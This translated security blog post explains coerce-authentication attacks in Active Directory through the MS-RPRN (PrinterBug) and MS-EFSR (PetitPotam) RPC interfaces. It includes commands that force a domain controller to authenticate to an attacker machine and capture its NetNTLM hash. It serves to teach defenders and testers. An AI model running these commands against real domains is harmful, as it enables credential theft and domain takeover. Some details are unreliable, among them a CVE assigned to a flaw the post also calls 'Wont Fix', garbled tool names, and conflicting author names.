Coerce | Parte 1

Coerce | Part 1

Celia Catalán


Within the Active Directory environment, attackers use forced authentication and MitM strategies to perform various actions. That is why, on this occasion, we will enter the topic of Coerce Authentication. Throughout different posts we will explain the different ways to perform this technique, as well as how to link it with other attacks to elevate privileges in a domain.

“Coerce authentication” is a technique that, through calls to Windows Remote Procedure Calls (RPC), forces a service to authenticate against a machine. Using this technique, an attacker can force a vulnerable server to authenticate against a machine controlled by the attacker and thus obtain the hash of the machine account password in NetNTLM format.

A machine account on Windows networks refers to a unique identity associated with a device on the network. Machine accounts are essential for establishing communication and collaboration between devices within a network environment with Windows operating systems.

Once the hash of a machine account has been obtained, a range of possible techniques open up to take advantage of this authentication to impersonate the victim. Part of the criticality of this technique lies in the fact that a machine is the victim. For example, if this technique is used against a domain controller, it is possible to compromise the entire domain, thus increasing the criticality of said technique.

What is RPC?

RPC stands for Remote Procedure Call, which is a form of inter-process communication (IPC). This technology allows applications to send signals to each other to perform an operation.

In Windows environments, RPC is heavily used for many different services, such as scheduling tasks, creating services, configuring printers, configuring shared resources, managing encrypted data stored remotely, among others. …

Due to the nature of RPC as a remote vector, it attracts a lot of attention from a computer security point of view.

Main Vulnerable RPCs 

Next, we proceed to list the main known vulnerable RPCs for the use of the “Coerce Authentication” technique.

It should be noted that, to exploit these RPCs, it is necessary to have a valid domain user account, although in the case of the RPC known as MS-EFSR, it is possible to run it without a user.

For this second case, where the exploitation was anonymous, Microsoft has considered this a vulnerability and has released security patches to correct it.

MS-RPRN

MS-RPRN is the Remote Procedure Call related to the remote printing system protocol.

Print Spooler from Microsoft is a service that manages print jobs and other printing-related tasks. An attacker controlling a domain user/computer can, with a specific RPC call, activate the spooler service of a target running it and cause it to authenticate to a target chosen by the attacker. This behavior is marked as “Wont Fix” from Microsoft and is enabled by default in all Windows environments.

Verification

To check if RPC is enabled on the victim's computer, you can use impacket 's rpcdump tool:

Command: python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN'

  

Ilustración 1 – MS-RPRN habilitado.

It should be noted that there are more methods to check if said RPC is enabled using other tools and techniques.

Exploitation


After verifying that the RPC called “MS-RPRN” is enabled in the victim, in addition to having compromised a domain user through other means, it will be exploited through a PoC called Printer Bug or SpoolSample which is assigned to it. the identifier CVE-2021-34527. 

Likewise, to verify that authentication is forced correctly, we will use the user “bob” with limited privileges in the domain “dc.corp.lab”.

Command: python3 printerbug.py “CORP/bob: @dc.corp.lab” attack_machine

Ilustración 2 – Explotación satisfactoria de printerbug.



After the vulnerability was exploited, the netNTLMv2 hash of the domain controller machine account was obtained. 

Ilustración 3 – Obtención hash NetNTLM.


MS-EFSR


MS-EFSR is the Remote Procedure Call related to the Remote File Encryption System protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network and is available as an RPC interface.
It should be noted that originally this RPC was exploitable anonymously, without the need to have previously compromised a domain user account. This is why Microsoft released two security patches, both on August 10, 2021, and on May 10, 2022, which are responsible for fixing the possibility of being able to perform this technique without a domain user.

Verification


In this case, we will use the crackmapexec tool, currently known as netexec , through the execution of the “petitpotam” module, to anonymously check whether the server is vulnerable or not:

Command: crackmapexec smb dc.corp.lab -M petitpotam

Ilustración 4 – Domain Controler vulnerable.

It should be noted that there are more methods to check if said RPC is enabled using other tools and techniques.

Exploitation


After verifying that the domain controller is vulnerable anonymously, it will be exploited through a PoC called Petit Potam which is assigned two identifiers CVE-2021-36942 and CVE-2022-26925 .

To verify that authentication is forced anonymously, we will run the PoC leaving the user (-u), password (-p) and domain (-d) parameters empty.

Command: python3 PetitPotam.py -u “” -p “” -d “” attack_machine dc.corp.lab

Ilustración 5 – Explotación satisfactoria de PetitPotam.

You can see the capture of the NetNTLM hash in the Reply tool.

Ilustración 7 – Obtención hash NetNTLM.


In future installments we will continue talking about other vulnerable CPR, until next time! Agur!

Dimas Pastor , Senior Analyst at Zerolynx Group .
return to blog

Leave a comment

Please note that comments must be approved before they are published.